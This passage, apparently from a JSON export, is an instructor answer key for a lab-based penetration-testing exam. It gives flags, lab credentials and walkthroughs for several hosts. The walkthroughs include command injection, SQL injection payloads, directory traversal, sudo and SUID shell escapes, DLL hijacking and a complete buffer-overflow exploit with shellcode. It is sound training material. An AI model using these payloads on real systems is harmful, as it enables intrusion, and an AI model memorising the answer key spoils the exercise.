zip file inside automation..\\\n    browse to &lt;float IP>/newtest/test/automation\\\n    click the Automation_test zip to download\\\n    exact the zip file\\\n    A user name and password are base64 encoded inside (name and sec variables) +\n5. enum share\\\n  ls -al /var/www/html/share\\\n    browse to &lt;float IP>/share and click the Untitled_Diagram.png\\\n    Diagram has the network ranges and assocated flag +\n6. enum stories/use the page\\\n  Page is set to display the 2 articles in the stories directory. Inside Possible_end.txt article the President’s middle name is identified.\n```\n- Gaining Access\n\n2 ways:\n\n&emsp;1. If student found the automation zip and unencoded the name and sec variables they can use that account to ssh into\n&emsp;2. Through command injection on \"select story to read\"\n```bash\n  ; mkdir /var/www/.ssh\n  ; echo 'their ssh key' > /var/www/.ssh/authorized_keys\n  ssh www-data@&lt;float IP>\n```\n- Moving into the network\n- Diagram in /share identifies the 192.168.28.0/27 and .160/27 networks. Access now with ether openupthedoor or www-data student conduct scans.\n\n```bash\nssh www-data@10.50.x.x -D 9050\n```\n\n* dirty ping sweep from ministry-defense system to see what is alive\n\n```bash\nfor i in {1..254} ;do (ping -c 1 192.168.28.$i | grep \"bytes from\" &) ;done\n```\n```bash\nproxychains nmap -sT -Pn -T5 <IPs>\n```\n\n* See that .173, and .180 all repsond with ether 22 or 80 open.\n- Pivot through\n\nWindows station:\n\n```bash\nssh www-data@10.50.x.x -L 8000:192.168.28.180:80 -L 2200:192.168.28.173:22\n```\n\n<strong>NOTE Port 2300 is insturctor login to Defense_KP</strong>\n````\n\n## Defense-KP\n\n### Databases\n\n- **Category\\:** SQL Injection\n  - **Question\\:** How many databases does the server house?\n  - **Flag\\:** 5 or five\n  - **Value\\:** 5 points\n\n### Commander\n\n- **Category\\:** SQL Injection\n  - **Question\\:** Who is the commander of the 3rd MLRS Regiment?\n  - **Flag\\:** Adam Balla\n  - **Value\\:** 5 points\n\n### Troops\n\n- **Category\\:** SQL Injection\n  - **Question\\:** How many soldiers are on hand for the 10th Armored Division?\n  - **Flag\\:** 4675\n  - **Value\\:** 5 points\n\n### Money (HIDDEN)\n\n- **Category\\:** SQL Injection\n  - **Question\\:** How much does an Armor unit cost?\n  - **Flag\\:** 5000000\n  - **Value\\:** 5 points\n\n### Names\n\n- **Category\\:** SQL Injection\n  - **Question\\:** The database has user accounts configured, identify one of the users full name.\n  - **Flag\\:** Rick Sanchez, Morty Smith, Frank Palicky, Krombopulos Michael\n  - **Value\\:** 5 points\n\n### DNS\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** What information of interest can be found associated to DNS translations?\n  - **Flag\\:** random 20 characters\n  - **Value\\:** 5 points\n\n??? NOTE Defense-KP Walkthrough\n\n````\n1. browse localhost:8000\n2. Landing page there is a refer to /forces/forcesreport.html\n3. robots.txt and see /Onlinetools and /login\n\n- *forcesreport.html*\n\n1. Dropdown box with 10 options, legit selection will show in the URL that Locations= is the variable being passed to the server. Looking at the page source will show that GET method is being used to pass the variable.\n2. Student should test each number with a blind inject to determine which 2 options are injectable (4th and 6th options are injectable)\n&emsp;- Blind inject example\n\n```html\n/forces/forcespick.php?Locations=1 and 1=1\n```\n\nEnum the database:\n- List databases\n```html\n/forcespick.php?Locations=6 union SELECT 1,2,3,schema_name FROM information_schema.schemata\n```\n\n* auth_user, forces, information_schema, mysql, performance_schema\n\n- List tables\n\n```html\nforcespick.php?Locations=6 UNION SELECT 1,table_name,3,4 from information_schema.tables where table_schema=database()\n```\n- commanders, locations, unit_type, units\n\n- List columns by table\n\n```html\n/forcespick.php?Locations=6UNION SELECT 1,2,3,column_name FROM information_schema.columns WHERE table_name='commanders'\n/forcespick.php?Locations=6UNION SELECT 1,2,3,column_name FROM information_schema.columns WHERE table_name='units'\n/forcespick.php?Locations=6 UNION SELECT * FROM units #(doesn't work for all tables since some have less than 4 columns)\n```\n\n- List commanders\n```\n/forcespick.php?Locations=6 UNION SELECT * FROM commanders\n/forcespick.php?Locations=6 UNION SELECT name,unit, 3,4 FROM commanders\n```\n\n- List unit on_hand\n```\n/forcespick.php?Locations=6 UNION SELECT on_hand,unit, 3,4 FROM units\n/forcespick.php?Locations=4 UNION SELECT * FROM units\n```\n\n- Find the cost of units\n```html\n/forcespick.php?Locations=6 UNION SELECT type,cost,3,4 from unit_type\n```\n\n- *Login page*\nFind through robots.txt or button on /forcesreport.html\n- Dump creds\n\n```html\nIn both loggin name and password fields input ' or 1='1\n```\n\n* Success will show 3 of 4 users.\n\n- From /forces\n```html\n/forcespick.php?Locations=6 union select name,password,1,2 from auth_users.logins\n```\n\n* Success will show 4 of users\n- Directory Transversal\nFind in robots.txt that points to /Onlinetools\n- Find flag in /etc/hosts\n```html\nURL: /Onlinetools/lookup.php?myfile=../../../../../etc/hosts\nFile to read field: ../../../../../etc/hosts\n```\n\n- Inside hosts file is a flag \"random 20 characters\" and IP to 3rd system in Part one of the PE\n&emsp;- random 20 characters\n&emsp;- 192.168.28.173 Defense_Nix1\n````\n\n## Defense\\_Nix1\n\n### Priv binary\n\n- **Category\\:** Linux Exploitation\n  - **Question\\:** What binary allowed for privilege escalation?\n  - **Flag\\:** env\n  - **Value\\:** 5 points\n\n### Root of it all\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** What flag resides at root?\n  - **Flag\\:** random 20 characters\n  - **Value\\:** 5 points\n\n### Script\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** What is the reference number of the script caused the abnormal port to run?\n  - **Flag\\:** random 20 characters\n  - **Value\\:** 5 points\n\n### Port\n\n- **Category\\:** Reconnaissance\n  - **Question\\:** What abnormal port is running?\n  - **Flag\\:** 21254\n  - **Value\\:** 5 points\n\n### Portable executable (HIDDEN)\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** What portable executable resides on the system? Can be found in RE challenge if not on system.\n  - **Flag\\:** RE\\_this\n  - **Value\\:** 5 points\n\n### RE (HIDDEN)\n\n- **Category\\:** Binary Analysis\n  - **Question\\:** How many numbers are required to have the only portable executable on the system print \"Congrats\"?\n  - **Flag\\:** 3\n  - **Value\\:** 5 points\n\n### Range of possible numbers\n\n- **Category\\:** Binary Analysis\n  - **Question\\:** What could one use for the first number to get the only portable executable on the system to print \"Congrats\"?\n  - **Flag\\:** 84,85 or 87\n  - **Value\\:** 5 points\n\n### Mutating (HIDDEN)\n\n- **Category\\:** Binary Analysis\n  - **Question\\:** Which assembly instruction is mutating numbers in the only portable executable on the system?\n  - **Flag\\:** shl, shift, or shr\n  - **Value\\:** 5 points\n\n:::note{title=\"Defense_Nix1 Walkthrough\" collapse=\"closed\"}\n```text\n1. Cred reuse from Defense_KP DB : Fpalic:Squanchy\n2. Gain root:\n  * enum show find that env is set to sudo by doing sudo -l\n  * sudo sudo env /bin/sh\n  * ls -al /root will show the Important.txt that holds the flag\n3. netstat -antu will show port 18999 runing question will ask student which script start abnormal port to run\n  * cat /etc/crontab will show\n    * * * * * * root /bin/bash /usr/share/.svchost.sh    -> (correct script, it is nc renamed to SecurityOnion &lt;-- flag inside)\n    * * * * * * root /bin/bash /etc/svch2st.py            -> (script start a tcp port on 123, which is NTP and not a abnormal port)\n    * * * * * * root /bin/bash /root/.hidden/svchost5.sh  -> (script that greps out the abnormal port, meant to help lead them to the port we want)\n  * They can also do ps -elf and follow the PID to PPID.\n4. Students should enum /home and see a /devops dir, inside will be the report the svchost5.sh produces and the .exe for them to pull back for RE. /devops is set with 757 so they will be able to pull back the exe to their stations without having to gain root.\n```\n\n:::\n\n## Part 2v2\n\n#### Setup\n\n- In CVTE, iptables will flush at 1200 or 1300 depending of DLS.\n- Part2v2 Notification should be sent out in CTFd.\n- Students will be given account creds for this part.\n- Students will also recieve a Windows exe to use for priv esc.\n\n#### Identify systems\n\nStudents should scan from ministry-defense into next CIDR network; 192.168.28.0/27.\n\n- dirty ping sweep from ministry-defense system and htna nmap live hosts.\n\n```bash\nfor i in {1..127} ;do (ping -c 1 192.168.28.$i | grep \"bytes from\" &) ;done\n\nnmap -sT -Pn -T5 <IPs>\n```\n\n- Student should see the .7, .12, .24 responsd with either 22 or 3389 open.\n\n#### Movement set up\n\n```bash\nssh openupthedoor@10.50.x.x -L 33890:192.168.28.7:3389  -L 3200:192.168.28.7:22 -L 3300:192.168.28.12:22 -L 3400:192.168.28.24:22\nopenupthedoor : L3r0yJenK1n5! (def min)\n\nxfreerdp /v:localhost:33890 /u:Rsanch /p:MrMeeseeks\n\nssh -p 3200 Msith@localhost\nMsmith:ScaryTerry\n\nssh -p 3300 Kmichae@localhost\nKmichae:Birdperson\n\nssh -p 3300 root@localhost\nOnly Instructos\n```\n\n## R\\_and\\_D\\_Nix1\n\n### Something is watching\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** Which running process could cause alarm to a person attempting to remain stealthy?\n  - **Flag\\:** rsyslogd\n  - **Value\\:** 5 points\n\n### How is it set up\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** A process that may cause an alarm, is configured to send data to an IP. The flag is written within the comments.\n  - **Flag\\:** 20 random characters\n  - **Value\\:** 5 points\n\n### Root of it all\n\n- **Category\\:** Linux Exploitation\n  - **Question\\:** What is inside the file located in roots directory?\n  - **Flag\\:** random 20 characters\n  - **Value\\:** 5 points\n\n### Priv Esc\n\n- **Category\\:** Linux Exploitation\n  - **Question\\:** What binary was used to escalate?\n  - **Flag\\:** watch\n  - **Value\\:** 5 points\n\n### Passwords\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** Identify any files that could contain passwords?\n  - **Flag\\:** 20 random characters\n  - **Value\\:** 5 points\n\n??? \"R\\_and\\_D\\_Nix1 Walkthrough\"\n\n````\nGain access through pivot using Msith:ScaryTerry creds\n\nOnce on sutdent should enum system.\n\n- *Find rsyslog*\n```bash\nnetstat -antu\n```\n\n* Should see system listening on TCP 514 which is syslog (quick search will tell them)\n```bash\nps -elf | grep syslog\n```\n* see that rsyslog is running\n```bash\ncat /etc/rsyslog.conf\n```\n* see that rsyslog is configured as a server with IP 192.168.28.199 as allowed to send its logs to the server\n- *Find SUID, move up, and the flag*\n\n```bash\nfind / -perm /4000 -type f 2>/dev/null -exec ls -l {} \\;\n```\n\n* In the list should see watch is set with SUID\n\n```bash\nwatch -x sh -p -c 'reset; exec sh -p 1>&0 2>&0'\nls -al /root\nls -al /root/home\ncat /root/home/secretmessage\n```\n\n- *Find password files*\n\n```bash\nfind / -iname *password*.txt 2>/dev/null\ncat /lib/libhanble/Passwords.txt\n```\n* Student should see that password.txt is from a abnormal directory.\n````\n\n## R\\_and\\_D\\_Nix2\n\n### User\n\n- **Category\\:** Reconnaissance\n  - **Question\\:** What message ID that was provided by the banner after access to the system was accomplished?\n  - **Flag\\:** random 20 characters\n  - **Value\\:** 5 points\n\n### Run as someone else\n\n- **Category\\:** Linux Exploitation\n  - **Question\\:** What program can be run at an elevated privilege level by the user you landed onto the box as?\n  - **Flag\\:** exploit\\_this\n  - **Value\\:** 5 points\n\n### Calling things (HIDDEN)\n\n- **Category\\:** Binary Analysis\n  - **Question\\:** How many directives are configured in the vulnerable binary?\n  - **Flag\\:** (sudio.h, string.h, stdlib.h)\n  - **Value\\:** 5 points\n\n### Function\n\n- **Category\\:** Exploit Development\n  - **Question\\:** What is the vulnerable function in the binary that can be run with elevated privileges by your user?\n  - **Flag\\:** strcpy\n  - **Value\\:** 5 points\n\n### Characters\n\n- **Category\\:** Exploit Development\n  - **Question\\:** How many characters are required in the buffer to overwrite the EIP?\n  - **Flag\\:** 38\n  - **Value\\:** 5 points\n\n### Secret\n\n- **Category\\:** Exploit Development\n  - **Question\\:** What is inside the file located at /root/home/secretmessage?\n  - **Flag\\:** random 20 characters\n  - **Value\\:** 5 points\n\n??? NOTE R\\_and\\_D\\_Nix2 Walkthrough\n\n````\n- setup for EB (compile binary on target system for test)\n\n* <strong>python3 has issue with encode NOP sled, it encodes as UT-8, so sled will have hex code of '90c2' vs '90'</strong>\n* student must recoginze that the file is involved with sudo so when they test the file they should run it as sudo\n* student gain initial access using Kmichae::Birdperson\n\n```bash\necho 0 | sudo tee /proc/sys/kernel/randomize_va_space\napt-get install gdb -y\napt-get install gcc-multilib -y\ngit clone https://github.com/longld/peda.git ~/peda\necho \"source ~/peda/peda.py\" >> ~/.gdbinit\necho \"DONE! debug your program with gdb and enjoy\"\ngcc -m32 -fno-stack-protector -z execstack -no-pie eb_source.c -o exploit_me\n```\n- Exploit dev on system\n```bash\nsudo gdb -q exploit_this\n\ndisas main\n\n# 0x080484d5 <+79>:\tcall   0x80484ec <test>  <----function call of test\n\ndisas test\n#  0x08048508 <+28>:\tcall   0x8048330 <strcpy@plt>  <---vuln buffer\n\nr $(python2.7 -c 'import sys;sys.stdout.write(\"A\"*100)')  #COMMENT seg fault, find EIP\n\nr $(python2.7 -c 'import sys;sys.stdout.write((\"A\"*44)+(\"B\"*4))') #COMMENT EIP has our 4 B's, we need 44 characters to get to it\n\nr $(python2.7 -c 'import sys;sys.stdout.write((\"A\"*38)+(\"B\"*4)+(\"C\"*55))') #COMMENT how many bytes we have for our shell code\n\nr $(python2.7 -c 'import sys;sys.stdout.write((\"A\"*38)+(\"B\"*4)+(\"\\x90\"*32)+(\"C\"*23))')  #padd with NOP to get EIP to point to our C's, grab ESP addres\ndisas test  #COMMENT grab out EIP (ret address)\n\nb * 0x08048527  #COMMENT set break pt at EIP\n\nr $(python2.7 -c 'import sys;sys.stdout.write((\"A\"*38)+(\"\\x70\\xd5\\xff\\xff\")+(\"\\x90\"*32)+(\"C\"*23))')\n\nr $(python2.7 -c 'import sys;sys.stdout.write((\"A\"*38)+(\"\\x50\\xd6\\xff\\xff\")+(\"\\x90\"*32)+(\"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"))')\n\nsudo ./exploit_this $(python2.7 -c 'import sys;sys.stdout.write((\"A\"*38)+(\"\\x50\\xd6\\xff\\xff\")+(b\"\\x90\"*32)+(\"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"))')\n#COMMENT have to play with the memory location outside of gdb.  Our locate in gdb was \\x70\\xd5\\xff\\xff, outside gdb \\x90\\xd5\\xff\\xff  will give us our shell\n```\n\n&emsp;OR\n\n<strong>Exploit.py</strong>\n\n```python\n#!/usr/bin/python\nbuffer = '\\x41' * 38\nEIP = \"\\x50\\xd6\\xff\\xff\"\nnop = '\\x90' * 32\nbuf = b\"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"\nprint(buffer + EIP + nop + buf)\n```\n\n<strong>NOTE :: If students do not run sudo with gdb or to throw the exploit they will have the incorrect memory addresses.</strong>\n````\n\n## R\\_and\\_D\\_Win1\n\n### Policies\n\n- **Category\\:** Windows Exploitation\n  - **Question\\:** How many security policies are set to log for both successful and failed events?\n  - **Flag\\:** 3\n  - **Value\\:** 5 points\n\n### Persistence\n\n- **Category\\:** Winodws Exploitation\n  - **Question\\:** What file is being used in an attempt to have persistence?\n  - **Flag\\:** kpersky\\_start.ps1\n  - **Value\\:** 5 points\n\n### Called program\n\n- **Category\\:** Windows Exploitation\n  - **Question\\:** Based on the file that is being used for persistence, a program is being called. What is the document number in the file that identifies the program?\n  - **Flag\\:** random 20 characters\n  - **Value\\:** 5 points\n\n### User file\n\n- **Category\\:** Post Exploitation\n  - **Question\\:** One of the users directories has a file that will provide a flag.\n  - **Flag\\:** randon 20 characters\n  - **Value\\:** 5 points\n\n### Logging (HIDDEN)\n\n- **Category\\:** Which command line interface tool is set for logging?\n  - **Question\\:** Windows Exploitation\n  - **Flag\\:** WMIC, WMI, wbem\n  - **Value\\:** 5 points\n\n### Home of Admin\n\n- **Category\\:** Windows Exploitation\n  - **Question\\:** What flag resides in Administrator’s home?\n  - **Flag\\:** random 20 characters\n  - **Value\\:** 5 points\n\n:::note{title=\"R_and_D_Win1 Walkthrough\" collapse=\"closed\"}\n- student gain initial access using Rsanch\\:\\:MrMeeseeks <strong>*Identify which CLI tool is logging*</strong>\n\n```bash\nreg query hklm\\software\\microsoft\\wbem\\cimom | findstr /i logging\n```\n\n- will see that wmic is set to logging errors.\n\n*Find persistence*\n\n```bat\nreg query HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows_updater\n```\n\n- will see that C\\:\\Program Files\\scripts\\kpersky\\_start.ps1 is being called\n\n*Find what exe is being called in the file inside the run key*\n\n```bat\ntype C:\\Program Files\\scripts\\kpersky_start.ps1\n```\n\n- will see that svh0st.exe is being started through powershell\n\n*Find flag in user directory*\n\n```bat\ndir /ah c:\\users\ntype c:\\users\\wante\\file.txt\n```\n\n- will see that Wantme directory is hidden, inside is a file with the flag which is base64 encoded\n- use online base64 decode to get the flag.\n\n<strong>student will have to priv esc to gain access</strong>\n\n<strong>*Admins flag and security policy setting*</strong>\n\n```bat\nauditpol /get /category:* | findstr /i \"success failure\"\n```\n\n<strong>*Flag in Admins users dir*</strong>\n\n- Once priv esc is done student can just go into Admins folder and grab the flag in the message file\n  Possible priv esc areas\n\n1. Putty.exe is being call through a system schtasks every minute.\n    - Putty folder is writable by the USER group, student can do a dll hijack by naming their dll ntmarta.dll. Than wait for the schtasks to start.\n2. C\\:\\MsEdge\\DL\\7zip.exe is able to be written over, we give students moveup.exe which will create a admin user hack \\: pass123 in the RDP group\n\n:::\n"
    }
  ],
  "teamSSOEnabled": false
}